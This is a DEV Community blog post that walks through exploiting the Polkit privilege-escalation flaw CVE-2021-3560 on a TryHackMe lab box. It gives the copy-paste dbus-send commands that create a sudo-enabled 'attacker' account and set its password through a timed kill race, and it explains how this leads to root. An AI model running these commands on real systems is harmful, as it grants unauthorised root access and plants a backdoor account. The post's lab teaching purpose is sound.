DEV Community

Cinnamon1212
Cinnamon1212

Posted on

2 2

Polkit CVE-2021-3560

Background

Polkit (AKA PolicyKit) is an essential component in Unix-like OSs for controlling system wide privileges. As you can imagine, exploiting this can lead to some nasty privilege escalation. There were a few mainstream OSs vulnerable to this (such as Ubuntu 20.04 and Red Hat Enterprise Linux 8), making this a very impactful exploit.

Understanding how and why this works

The original report can be found here.

Polkit is used to allocate privileges for users and processes. This exploit takes advantage of our ability to kill a dbus-send command the dbus daemon is able to pass Polkit the correct ID. In turn, Polkit errors and substitutes a 0 (all privs/root).

Demonstration

I'll be using the polkit box from TryHackMe to demonstrate this
We'll follow through the tutorial process. Our first command is:

time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:attacker string:"Pentester Account" int32:1
Enter fullscreen mode Exit fullscreen mode

It's pretty long, let's dissect it. This command will be ran and monitored using "time". Remember we need time in order to check when we need to kill the dbus-send command. Our dbus-send command is going to request to create a user called attacker (and print the reply back to us). Typically we'll see this happen in a GUI and we'd then be prompted to give a password.
That takes us to our next command:

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$TRiYeJLXw8mLuoxS$UKtnjBa837v4gk8RsQL2qrxj.0P8c9kteeTnN.B3KeeeiWVIjyH17j6sLzmcSHn5HTZLGaaUDMC4MXCjIupp8.' string:'Ask the pentester' & sleep 0.005s; kill $!'
Enter fullscreen mode Exit fullscreen mode

To continue making our new account, we need to provide a password. This takes a Sha512Crypt hash as input and uses that for the password. In plain text, the password is "Expl01ted".
Finally, we'll use the delay that we previously found to kill the command before the dbus-daemon is able to give Polkit our ID.
We're given a new account called attacker with the password of Expl01ted that's automatically added as a sudoer. We can su into this account and then sudo su to root.

How does this look in practice?

Honestly? It looks simpler than you'd expect. Other than the timing of the command, this is a low complexity attack since there's copy and paste dbus commands that we can use for this. Though even without those, some understanding of using dbus utils will let you exploit this.

exploit

Image of Docusign

🛠️ Bring your solution into Docusign. Reach over 1.6M customers.

Docusign is now extensible. Overcome challenges with disconnected products and inaccessible data by bringing your solutions into Docusign and publishing to 1.6M customers in the App Center.

Learn more

Top comments (0)

A Workflow Copilot. Tailored to You.

Pieces.app image

Our desktop app, with its intelligent copilot, streamlines coding by generating snippets, extracting code from screenshots, and accelerating problem-solving.

Read the docs

👋 Kindness is contagious

Explore a sea of insights with this enlightening post, highly esteemed within the nurturing DEV Community. Coders of all stripes are invited to participate and contribute to our shared knowledge.

Expressing gratitude with a simple "thank you" can make a big impact. Leave your thanks in the comments!

On DEV, exchanging ideas smooths our way and strengthens our community bonds. Found this useful? A quick note of thanks to the author can mean a lot.

Okay